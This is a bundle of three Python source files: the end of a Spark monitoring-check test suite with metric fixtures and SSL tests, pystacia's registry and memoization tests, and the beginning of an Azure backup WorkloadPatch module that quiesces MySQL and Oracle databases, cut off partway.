'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode'
}
SSL_NO_VERIFY_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'ssl_verify': False
}
SSL_CERT_CONFIG = {
'spark_url': SSL_SERVER_URL,
'cluster_name': CLUSTER_NAME,
'spark_cluster_mode': 'spark_standalone_mode',
'ssl_verify': os.path.join(CERTIFICATE_DIR, 'cert.cert')
}
SPARK_JOB_RUNNING_METRIC_VALUES = {
'spark.job.count': 2,
'spark.job.num_tasks': 20,
'spark.job.num_active_tasks': 30,
'spark.job.num_completed_tasks': 40,
'spark.job.num_skipped_tasks': 50,
'spark.job.num_failed_tasks': 60,
'spark.job.num_active_stages': 70,
'spark.job.num_completed_stages': 80,
'spark.job.num_skipped_stages': 90,
'spark.job.num_failed_stages': 100
}
SPARK_JOB_RUNNING_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:running',
]
SPARK_JOB_SUCCEEDED_METRIC_VALUES = {
'spark.job.count': 3,
'spark.job.num_tasks': 1000,
'spark.job.num_active_tasks': 2000,
'spark.job.num_completed_tasks': 3000,
'spark.job.num_skipped_tasks': 4000,
'spark.job.num_failed_tasks': 5000,
'spark.job.num_active_stages': 6000,
'spark.job.num_completed_stages': 7000,
'spark.job.num_skipped_stages': 8000,
'spark.job.num_failed_stages': 9000
}
SPARK_JOB_SUCCEEDED_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:succeeded',
]
SPARK_STAGE_RUNNING_METRIC_VALUES = {
'spark.stage.count': 3,
'spark.stage.num_active_tasks': 3*3,
'spark.stage.num_complete_tasks': 4*3,
'spark.stage.num_failed_tasks': 5*3,
'spark.stage.executor_run_time': 6*3,
'spark.stage.input_bytes': 7*3,
'spark.stage.input_records': 8*3,
'spark.stage.output_bytes': 9*3,
'spark.stage.output_records': 10*3,
'spark.stage.shuffle_read_bytes': 11*3,
'spark.stage.shuffle_read_records': 12*3,
'spark.stage.shuffle_write_bytes': 13*3,
'spark.stage.shuffle_write_records': 14*3,
'spark.stage.memory_bytes_spilled': 15*3,
'spark.stage.disk_bytes_spilled': 16*3,
}
SPARK_STAGE_RUNNING_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:running',
]
SPARK_STAGE_COMPLETE_METRIC_VALUES = {
'spark.stage.count': 2,
'spark.stage.num_active_tasks': 100*2,
'spark.stage.num_complete_tasks': 101*2,
'spark.stage.num_failed_tasks': 102*2,
'spark.stage.executor_run_time': 103*2,
'spark.stage.input_bytes': 104*2,
'spark.stage.input_records': 105*2,
'spark.stage.output_bytes': 106*2,
'spark.stage.output_records': 107*2,
'spark.stage.shuffle_read_bytes': 108*2,
'spark.stage.shuffle_read_records': 109*2,
'spark.stage.shuffle_write_bytes': 110*2,
'spark.stage.shuffle_write_records': 111*2,
'spark.stage.memory_bytes_spilled': 112*2,
'spark.stage.disk_bytes_spilled': 113*2,
}
SPARK_STAGE_COMPLETE_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:complete',
]
SPARK_DRIVER_METRIC_VALUES = {
'spark.driver.rdd_blocks': 99,
'spark.driver.memory_used': 98,
'spark.driver.disk_used': 97,
'spark.driver.active_tasks': 96,
'spark.driver.failed_tasks': 95,
'spark.driver.completed_tasks': 94,
'spark.driver.total_tasks': 93,
'spark.driver.total_duration': 92,
'spark.driver.total_input_bytes': 91,
'spark.driver.total_shuffle_read': 90,
'spark.driver.total_shuffle_write': 89,
'spark.driver.max_memory': 278019440,
}
SPARK_EXECUTOR_METRIC_VALUES = {
'spark.executor.count': 2,
'spark.executor.rdd_blocks': 1,
'spark.executor.memory_used': 2,
'spark.executor.disk_used': 3,
'spark.executor.active_tasks': 4,
'spark.executor.failed_tasks': 5,
'spark.executor.completed_tasks': 6,
'spark.executor.total_tasks': 7,
'spark.executor.total_duration': 8,
'spark.executor.total_input_bytes': 9,
'spark.executor.total_shuffle_read': 10,
'spark.executor.total_shuffle_write': 11,
'spark.executor.max_memory': 555755765,
}
SPARK_RDD_METRIC_VALUES = {
'spark.rdd.count': 1,
'spark.rdd.num_partitions': 2,
'spark.rdd.num_cached_partitions': 2,
'spark.rdd.memory_used': 284,
'spark.rdd.disk_used': 0,
}
SPARK_STREAMING_STATISTICS_METRIC_VALUES = {
'spark.streaming.statistics.avg_input_rate': 1.0,
'spark.streaming.statistics.avg_processing_time': 175,
'spark.streaming.statistics.avg_scheduling_delay': 8,
'spark.streaming.statistics.avg_total_delay': 183,
'spark.streaming.statistics.batch_duration': 2000,
'spark.streaming.statistics.num_active_batches': 2,
'spark.streaming.statistics.num_active_receivers': 1,
'spark.streaming.statistics.num_inactive_receivers': 3,
'spark.streaming.statistics.num_processed_records': 7,
'spark.streaming.statistics.num_received_records': 9,
'spark.streaming.statistics.num_receivers': 10,
'spark.streaming.statistics.num_retained_completed_batches': 27,
'spark.streaming.statistics.num_total_completed_batches': 28,
}
SPARK_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME
]
def test_yarn(aggregator):
with mock.patch('requests.get', yarn_requests_get_mock):
c = SparkCheck('spark', None, {}, [YARN_CONFIG])
c.check(YARN_CONFIG)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS, value=value)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
tags = ['url:http://localhost:8088', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_auth_yarn(aggregator):
with mock.patch('requests.get', yarn_requests_auth_mock):
c = SparkCheck('spark', None, {}, [YARN_AUTH_CONFIG])
c.check(YARN_AUTH_CONFIG)
tags = ['url:http://localhost:8088', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
def test_mesos(aggregator):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', None, {}, [MESOS_CONFIG])
c.check(MESOS_CONFIG)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the service tests
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:5050', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_mesos_filter(aggregator):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', None, {}, [MESOS_FILTERED_CONFIG])
c.check(MESOS_FILTERED_CONFIG)
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:5050', 'cluster_name:SparkCluster']
assert aggregator.metrics_asserted_pct == 100.0
def test_standalone(aggregator):
with mock.patch('requests.get', standalone_requests_get_mock):
c = SparkCheck('spark', None, {}, [STANDALONE_CONFIG])
c.check(STANDALONE_CONFIG)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080', 'cluster_name:SparkCluster']
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040', 'cluster_name:SparkCluster']
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_standalone_pre20(aggregator):
with mock.patch('requests.get', standalone_requests_pre20_get_mock):
c = SparkCheck('spark', None, {}, [STANDALONE_CONFIG_PRE_20])
c.check(STANDALONE_CONFIG_PRE_20)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080', 'cluster_name:SparkCluster']
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040', 'cluster_name:SparkCluster']
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_ssl():
run_ssl_server()
c = SparkCheck('spark', None, {}, [SSL_CONFIG])
with pytest.raises(requests.exceptions.SSLError):
c.check(SSL_CONFIG)
def test_ssl_no_verify():
# Disable ssl warning for self signed cert/no verify
requests.packages.urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', None, {}, [SSL_NO_VERIFY_CONFIG])
c.check(SSL_NO_VERIFY_CONFIG)
def test_ssl_cert():
# Disable ssl warning for self signed cert/no verify
requests.packages.urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', None, {}, [SSL_CERT_CONFIG])
c.check(SSL_CERT_CONFIG)
class StandaloneAppsResponseHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'r') as f:
self.wfile.write(f.read())
def run_ssl_server():
cert_file = os.path.join(CERTIFICATE_DIR, 'server.pem')
httpd = BaseHTTPServer.HTTPServer((SSL_SERVER_ADDRESS, SSL_SERVER_PORT), StandaloneAppsResponseHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert_file, server_side=False)
httpd.timeout = 5
threading.Thread(target=httpd.handle_request).start()
time.sleep(.5)
return httpd
|
util_tests.py
|
# coding: utf-8
# pystacia/tests/util_tests.py
# Copyright (C) 2011 by Paweł Piotr Przeradowski
#
# This module is part of Pystacia and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import math
from time import sleep
from random import randint, choice, sample
from threading import Thread
from pystacia.tests.common import TestCase, skipIf
class RegistryTest(TestCase):
def setUp(self):
self.registry = Registry()
def test_simple(self):
registry = self.registry
registry.value = 2
self.assertEqual(registry.value, 2)
self.assertTrue(hasattr(registry, 'value'))
self.assertEqual(registry.get('value', 3), 2)
self.assertEqual(registry.get('value', 3, 3), 3)
del registry.value
self.assertFalse(hasattr(registry, 'value'))
self.assertEqual(registry.get('value', 3), 3)
self.assertEqual(registry.get('value', 3, 2), 2)
self.assertRaises(AttributeError, lambda: registry.value)
def test_defaults(self):
registry = self.registry
registry._install_default('value', 4)
self.assertEqual(registry.value, 4)
registry.value = 5
self.assertEqual(registry.value, 5)
del registry.value
self.assertEqual(registry.value, 4)
def test_lock(self):
registry = self.registry
registry.value = 3
registry._lock('value')
self.assertEqual(registry.value, 3)
def assign():
registry.value = 4
self.assertRaisesRegexp(PystaciaException, 'has been locked',
assign)
def delete():
del registry.value
self.assertRaisesRegexp(PystaciaException, 'has been locked',
delete)
def test_threaded(self):
registry = self.registry
for x in range(0, 20):
setattr(registry, 'value_' + str(x), x)
def thread():
sleep(0.01)
for x in sample(range(0, 20), 18):
self.assertEqual(getattr(registry, 'value_' + str(x)), x)
if randint(0, 1):
registry._install_default('value_' + str(x), 2 * x)
threads = [Thread(target=thread) for _ in range(0, 50)]
[t.start() for t in threads[:10]]
for x in range(0, 15):
registry._lock('value_' + str(x))
[t.start() for t in threads[10:]]
for x in range(15, 20):
registry._lock('value_' + str(x))
[t.join() for t in threads]
class MemoizedTest(TestCase):
def test(self):
a = producer()
self.assertEqual(producer(), a)
self.assertEqual(add(1, 2), 3)
self.assertNotEqual(producer(1), a)
def test_threaded(self):
def thread():
for _ in range(randint(0, 20)):
a = randint(0, 100)
b = randint(0, 100)
self.assertEqual(add(a, b), a + b)
threads = [Thread(target=thread) for _ in range(randint(0, 50))]
[t.start() for t in threads]
[t.join() for t in threads]
def test_nested(self):
funcs = [add3, add3, add]
def thread():
for _ in range(randint(0, 20)):
func = choice(funcs)
a = randint(0, 100)
b = randint(0, 100)
if func == add:
self.assertEqual(func(a, b), a + b)
elif func == add3:
c = randint(0, 100)
self.assertEqual(func(a, b, c), a + b + c)
threads = [Thread(target=thread) for _ in range(randint(0, 50))]
[t.start() for t in threads]
[t.join() for t in threads]
def test_recursive(self):
def thread():
for _ in range(randint(0, 20)):
a = randint(0, 100)
self.assertEqual(recurse(a), a)
threads = [Thread(target=thread) for _ in range(randint(0, 50))]
[t.start() for t in threads]
[t.join() for t in threads]
@skipIf(not hasattr(math, 'factorial'), 'Python without factorial')
def test_threaded_recursive(self):
def thread():
x = randint(1, 7)
self.assertEqual(threaded_factorial(x), math.factorial(x))
threads = [Thread(target=thread) for _ in range(0, 50)]
[t.start() for t in threads]
[t.join() for t in threads]
class A(object):
pass
from pystacia.util import memoized
@memoized
def producer(arg=None):
"""doc"""
return A()
@memoized
def add(a, b):
return a + b
@memoized
def add3(a, b, c):
return add(a, b) + c
@memoized
def recurse(i):
if not i:
return 0
else:
return recurse(i - 1) + 1
class SubThread(Thread):
def __init__(self, i):
self.i = i
super(SubThread, self).__init__()
def run(self):
self.result = threaded_factorial(self.i)
@memoized
def threaded_factorial(i):
if i == 1:
return 1
else:
subthread = SubThread(i - 1)
subthread.start()
subthread.join()
return i * subthread.result
from pystacia.util import Registry, PystaciaException
|
WorkloadPatch.py
|
#!/usr/bin/python
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+
import sys
import Utils.HandlerUtil
import threading
import os
from time import sleep
try:
import ConfigParser as ConfigParsers
except ImportError:
import configparser as ConfigParsers
import subprocess
from common import CommonVariables
from workloadPatch.LogBackupPatch import LogBackupPatch
class ErrorDetail:
def __init__(self, errorCode, errorMsg):
self.errorCode = errorCode
self.errorMsg = errorMsg
class WorkloadPatch:
def __init__(self, logger):
self.logger = logger
self.name = None
self.command = ""
self.dbnames = []
self.cred_string = ""
self.ipc_folder = None
self.error_details = []
self.enforce_slave_only = 0
self.role = "master"
self.child = []
self.timeout = 90
self.sudo_user = "sudo"
self.outfile = ""
self.logbackup = ""
self.confParser()
def pre(self):
try:
self.logger.log("WorkloadPatch: Entering workload pre call")
if self.role == "master" and int(self.enforce_slave_only) == 0:
if len(self.dbnames) == 0 :
#pre at server level create fork process for child and append
self.preMaster()
else:
self.preMasterDB()
# create fork process for child
elif self.role == "slave":
if len(self.dbnames) == 0 :
#pre at server level create fork process for child and append
self.preSlave()
else:
self.preSlaveDB()
# create fork process for child
else:
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidRole, "invalid role name in config"))
except Exception as e:
self.logger.log("WorkloadPatch: exception in pre" + str(e))
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadPreError, "Exception in pre"))
def post(self):
try:
self.logger.log("WorkloadPatch: Entering workload post call")
if self.role == "master":
if len(self.dbnames) == 0:
#post at server level to turn off readonly mode
self.postMaster()
else:
self.postMasterDB()
elif self.role == "slave":
if len(self.dbnames) == 0 :
#post at server level to turn on slave
self.postSlave()
else:
self.postSlaveDB()
else:
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidRole, "invalid role name in config"))
except Exception as e:
self.logger.log("WorkloadPatch: exception in post" + str(e))
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadPostError, "exception in processing of postscript"))
def preMaster(self):
self.logger.log("WorkloadPatch: Entering pre mode for master")
if self.ipc_folder != None:
self.outfile = os.path.join(self.ipc_folder, "azbackupIPC.txt")
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at pre")
global preWorkloadStatus
preWorkloadStatus = self.workloadStatus()
if "OPEN" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus is open")
elif "NOT APPLY" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not apply")
else:
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not open.")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadDatabaseNotOpen, "Pre- Workload not open"))
return None
if 'mysql' in self.name.lower():
self.logger.log("WorkloadPatch: Create connection string for premaster mysql")
if self.outfile == "":
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadIPCDirectoryMissing, "IPC directory missing"))
return None
prescript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/preMysqlMaster.sql")
arg = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" -e\"set @timeout="+self.timeout+";set @outfile=\\\"\\\\\\\""+self.outfile+"\\\\\\\"\\\";source "+prescript+";\""
binary_thread = threading.Thread(target=self.thread_for_sql, args=[arg])
binary_thread.start()
self.waitForPreScriptCompletion()
elif 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Pre- Inside oracle pre")
preOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/preOracleMaster.sql ")
args = [self.sudo_user, preOracle]
process = subprocess.Popen(args)
wait_counter = 5
while process.poll() == None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.timeoutDaemon()
self.logger.log("WorkloadPatch: Pre- Exiting pre mode for master")
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def postMaster(self):
self.logger.log("WorkloadPatch: Entering post mode for master")
if self.ipc_folder != None: #IPCm based workloads
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at post")
if len(self.child) == 0 or self.child[0].poll() is not None:
self.logger.log("WorkloadPatch: Not app consistent backup")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadQuiescingTimeout,"not app consistent"))
return
elif self.child[0].poll() is None:
self.logger.log("WorkloadPatch: pre connection still running. Sending kill signal")
self.child[0].kill()
else: #non IPC based workloads
if preDaemonThread.isAlive():
self.logger.log("WorkloadPatch: Post- Timeout daemon still in sleep. Terminating ...")
daemonProcess.terminate()
else:
self.logger.log("WorkloadPatch: Post Error- Timeout daemon executed before post")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadQuiescingTimeout,"not app consistent"))
return
postWorkloadStatus = self.workloadStatus()
if postWorkloadStatus != preWorkloadStatus:
self.logger.log("WorkloadPatch: Pre and post database status different.")
if "OPEN" in str(postWorkloadStatus):
self.logger.log("WorkloadPatch: Post- Workload is open")
elif "NOT APPLY" in str(postWorkloadStatus):
self.logger.log("WorkloadPatch: Post- WorkloadStatus not apply")
else:
self.logger.log("WorkloadPatch: Post- Workload is not open")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadDatabaseNotOpen, "Post- Workload is not open"))
return None
if 'mysql' in self.name.lower():
self.logger.log("WorkloadPatch: Create connection string for post master")
postscript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/postMysqlMaster.sql")
args = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" < "+postscript
self.logger.log("WorkloadPatch: command to execute: "+str(args))
post_child = subprocess.Popen(args,stdout=subprocess.PIPE,stdin=subprocess.PIPE,shell=True,stderr=subprocess.PIPE)
elif 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Post- Inside oracle post")
postOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/postOracleMaster.sql ")
args = [self.sudo_user, postOracle]
process = subprocess.Popen(args)
wait_counter = 5
while process.poll()==None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.logger.log("WorkloadPatch: Post- Completed")
self.callLogBackup()
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def preSlave(self):
self.logger.log("WorkloadPatch: Entering pre mode for sloave")
if self.ipc_folder != None:
self.outfile = os.path.join(self.ipc_folder, "azbackupIPC.txt")
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at pre")
global preWorkloadStatus
preWorkloadStatus = self.workloadStatus()
if "OPEN" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus is open")
elif "NOT APPLY" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not apply")
else:
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not open.")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadDatabaseNotOpen, "Pre- Workload not open"))
return None
if 'mysql' in self.name.lower():
self.logger.log("WorkloadPatch: Create connection string for preslave mysql")
if self.outfile == "":
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadIPCDirectoryMissing, "IPC directory missing"))
return None
prescript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/preMysqlSlave.sql")
arg = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" -e\"set @timeout="+self.timeout+";set @outfile=\\\"\\\\\\\""+self.outfile+"\\\\\\\"\\\";source "+prescript+";\""
binary_thread = threading.Thread(target=self.thread_for_sql, args=[arg])
binary_thread.start()
self.waitForPreScriptCompletion()
elif 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Pre- Inside oracle pre")
preOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/preOracleMaster.sql ")
args = [self.sudo_user, preOracle]
process = subprocess.Popen(args)
wait_counter = 5
while process.poll() == None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.timeoutDaemon()
self.logger.log("WorkloadPatch: Pre- Exiting pre mode for slave")
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def postSlave(self):
self.logger.log("WorkloadPatch: Entering post mode for slave")
if self.ipc_folder != None:
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at post")
if len(self.child) == 0:
self.logger.log("WorkloadPatch: Not app consistent backup")
self.error_details.append("not app consistent")
elif self.child[0].poll() is None:
